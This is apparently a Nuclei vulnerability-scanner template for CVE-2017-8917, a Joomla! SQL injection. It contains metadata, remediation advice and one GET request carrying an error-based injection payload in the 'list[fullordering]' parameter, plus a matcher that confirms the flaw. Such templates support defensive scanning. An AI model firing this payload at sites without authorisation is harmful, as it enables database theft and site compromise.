nuclei-templates/http/cves/2017/CVE-2017-8917.yaml

47 lines
1.8 KiB
YAML

id: CVE-2017-8917
info:
name: Joomla! <3.7.1 - SQL Injection
author: princechaddha
severity: critical
description: |
Joomla! before 3.7.1 contains a SQL injection vulnerability. An attacker can possibly obtain sensitive information from a database, modify data, and execute unauthorized administrative operations in the context of the affected site.
impact: |
Successful exploitation of this vulnerability can lead to unauthorized access, data theft, and potential compromise of the entire Joomla! website.
remediation: |
Upgrade Joomla! to version 3.7.1 or later to mitigate the SQL Injection vulnerability.
reference:
- https://developer.joomla.org/security-centre/692-20170501-core-sql-injection.html
- https://nvd.nist.gov/vuln/detail/CVE-2017-8917
- https://web.archive.org/web/20211207050608/http://www.securitytracker.com/id/1038522
- http://www.securitytracker.com/id/1038522
- https://github.com/binfed/cms-exp
classification:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score: 9.8
cve-id: CVE-2017-8917
cwe-id: CWE-89
epss-score: 0.97555
epss-percentile: 0.99997
cpe: cpe:2.3:a:joomla:joomla\!:3.7.0:*:*:*:*:*:*:*
metadata:
verified: true
max-request: 1
vendor: joomla
product: joomla\!
shodan-query: http.component:"Joomla"
tags: cve2017,cve,joomla,sqli
variables:
num: "999999999"
http:
- method: GET
path:
- "{{BaseURL}}/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml(0x23,concat(1,md5({{num}})),1)"
matchers:
- type: word
part: body
words:
- '{{md5(num)}}'
# digest: 490a0046304402202a42607f81069bc80a480ecb156ace94e0e76862ee4d3c4f68a9b927f241d59402207c07437e69c7376ab7c771a7bb2fa469bcc225985cb16e57a19da92fe3f20241:922c64590222798bb761d5b6d8e72950